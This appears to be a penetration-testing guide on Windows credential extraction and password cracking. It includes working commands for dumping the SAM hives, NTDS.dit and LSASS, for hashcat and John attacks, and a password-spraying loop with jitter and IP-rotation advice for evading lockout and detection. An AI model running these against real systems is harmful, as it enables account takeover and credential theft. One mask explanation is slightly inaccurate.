Password Security Assessment and Credential Testing

Windows Credential Architecture and Hash Extraction

Understanding Windows credential storage is fundamental to effective password security assessment. The Local Security Authority Subsystem Service (LSASS) caches authentication credentials in memory, including NTLM hashes, Kerberos tickets, and cleartext passwords for single sign-on and network authentication. This makes LSASS memory dumps extraordinarily valuable for penetration testers.

The Security Accounts Manager (SAM) database stores local user credentials, but these are encrypted with a key from the SYSTEM registry hive. The reg save command captures this offline:

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

For Active Directory environments, the NTDS.dit file contains the entire directory database, including all domain users' hash histories. Critically, NTDS.dit requires the SYSTEM hive for decryption because the PEK (Password Encryption Key) is stored there. The file is locked by the NTDS service, requiring techniques like Volume Shadow Copy Service (VSS) extraction:

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy*\Windows\NTDS\NTDS.dit C:\temp\ntds.dit

Memory dumps capture credentials in active use. Tools like pypykatz (a Python implementation of Mimikatz) parse LSASS dumps without requiring Windows execution:

# Extracting hashes from a Windows 10 VM memory dump
pypykatz lsa minidump /var/captures/win10vm.dmp

# Sample output shows NTLM hash (mode 1000):
# Username: jsmith
# NTHash: aad3b435b51404eeaad3b435b51404ee:64F12CDDAA88057E06A81B54E73B949B

The output reveals the classic LM:NTLM structure where the LM hash is empty (indicating the password exceeds 14 characters or LM hashing is disabled), and the NTLM hash represents the MD4 of the UTF-16LE encoded password.

Hashcat: Rule-Based and Mask-Based Optimization

Hashcat's performance depends heavily on attack optimization. Understanding benchmark interpretation guides hardware allocation. Run hashcat -b -m 1000 to measure NTLM speeds; the key metric is H/s (hashes per second), not candidates per second, as some candidates may be rejected by rules.

Workload profiles (-w 1 through -w 4) control GPU utilization: -w 1 for desktop responsiveness, -w 3 for dedicated cracking workstations, and -w 4 for maximum performance with potential desktop lag. The --backend-devices flag isolates specific GPUs in multi-card setups.

Rules transform a base wordlist through systematic modifications. The distinction between rule sets matters enormously:

Rule Set	Purpose	Example Transformation
`best64.rule`	Hashcat built-in; broad coverage	`$1$2$3` appends "123"
`dive.rule`	Deep mutation combinations	Multiple cascaded rules
`OneRuleToRuleThemAll.rule`	Community-optimized hybrid	Context-aware substitutions

Masks attack known patterns when password structure is partially understood. Mask syntax uses placeholders: ?l (lowercase), ?u (uppercase), ?d (digit), ?s (special). For a password following the pattern CompanyName2024!:

hashcat -m 1000 -a 3 hashes.txt -1 ?u ?l?l?l?l?l?l?l?l?d?d?d?d?s -w 3 -O

This specifies: one uppercase custom charset (-1 ?u), followed by seven lowercase letters, four digits, and one special character. The -O flag enables optimized kernel, dramatically increasing speed for masks under 32 characters.

When the company name is known but exact capitalization varies, combine approaches:

hashcat -m 1000 -a 0 hashes.txt wordlist.txt -r rules/custom_company.rule -w 3

A custom rule file might contain:

c $2 $0 $2 $4 $!
so0 si1 $2 $0 $2 $4 $!

The first line capitalizes the word and appends "2024!"; the second substitutes 'o'→'0', 'i'→'1' before appending.

John the Ripper Community-Enhanced Features

John the Ripper's Jumbo edition extends core functionality with format-specific crackers and intelligent modes. Its --loopback flag feeds cracked passwords back as new wordlist entries, exploiting password reuse patterns. The --prince mode (PRObabilistic Infinite Chained Elements) generates candidates based on observed probability distributions rather than brute enumeration.

For Windows hashes, John's nt format handles NTLM, while mscash2 tackles cached domain credentials. The --show command reveals already-cracked hashes without reprocessing:

john --format=nt --show hashes.txt
# then loopback for deeper patterns:
john --format=nt --loopback hashes.txt

Community contributions include statsgen and maskgen for analyzing password leaks and generating optimized masks from actual corpora—superior to generic assumptions.

Password Policy Analysis and Statistical Weaknesses

Effective assessment examines policy enforcement gaps. Tools like cracklib-check and lpcp (Local Password Complexity Policy) reveal whether technical controls match documented policy. Statistical analysis of cracked passwords exposes systemic weaknesses: seasonal patterns (Summer2024!), keyboard walks (Qwerty123!), and organizational dependencies.

Calculate password entropy from observed samples. A policy requiring 12 characters with complexity often yields predictable substitutions (P@ssw0rd1234) that reduce effective entropy below 30 bits despite surface complexity.

Enterprise Password Spraying and Credential Stuffing

Password spraying inverts the brute-force approach: few passwords against many accounts, evading individual lockout thresholds. Success depends on reconnaissance and timing discipline.

Reconnaissance: Enumerate authentication endpoints—OWA, VPN portals, federated SAML/WS-Federation points. Federation considerations are critical: Azure AD may enforce different lockout policies than on-premises AD, and pass-through authentication agents can yield inconsistent results across endpoints.

Lockout threshold analysis: Probe with known-invalid passwords to identify the badPwdCount threshold and observation window. The net accounts /domain command reveals policy, but smarter enumeration tests actual boundaries:

# Spray with 30-minute intervals exceeding typical 30-minute windows
for user in $(cat users.txt); do
    python3 ntlm_passwordspray.py -u "$user" -p "Winter2024!" -t https://mail.target.com/owa/
    sleep $((1800 + RANDOM % 600))  # 30-40 minute jitter
done

Detection evasion through timing jitter: Uniform intervals trigger behavioral analytics. Implement variable delays with Gaussian or exponential distributions. Some tools randomize User-Agent strings and source IPs across proxy pools.

Credential stuffing leverages breached databases. Tools like CredMaster with FireProx integration rotate AWS API Gateway endpoints, presenting unique source IPs per request and defeating IP-based rate limiting. The --jitter 120 flag introduces random delays between authentication attempts.

Defensive awareness includes understanding smart lockout in Azure AD, which differentiates familiar from unfamiliar locations, and password hash synchronization where cloud and on-premises policies diverge. Spraying against federated endpoints often bypasses smart lockout entirely, falling back to on-premises policies that may be less restrictive.

The intersection of technical extraction, optimized cracking, and human behavioral patterns makes password assessment uniquely challenging—requiring both computational resources and psychological insight into organizational password construction habits.